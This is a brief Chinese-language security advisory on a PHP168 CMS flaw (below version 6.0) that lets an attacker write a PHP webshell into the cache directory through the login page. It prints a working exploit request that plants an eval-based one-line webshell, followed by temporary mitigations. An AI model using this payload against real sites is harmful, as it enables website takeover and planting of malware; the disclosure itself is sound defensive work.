最近PHP168的最新漏洞 危险等级：极高

　　漏洞测试版本：PHP168 6.0以下版本

　　由于php过滤不严导致，入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。

　　测试语句： ?makehtml=1&chdb[htmlname]=hack.php&chdb[path]=cache&content=?php%20@eval($_POST[hack]);?>

　　目前该漏洞入侵动画已经在互联网发布出来，该漏洞造成很多网站已经遭挂马或者入侵。如果您的网站系统是php168或者此类版本，请立即检查网站cache目录下是否已经写入木马。 目前官方还未公布漏洞补丁，黑基网提供临时解决方案：

　　1. 请您修改根目录下的login.php文件名

　　2.如果实在怕被再次入侵可以考虑设置cache目录无脚本执行权限来临时阻止此漏洞的侵袭。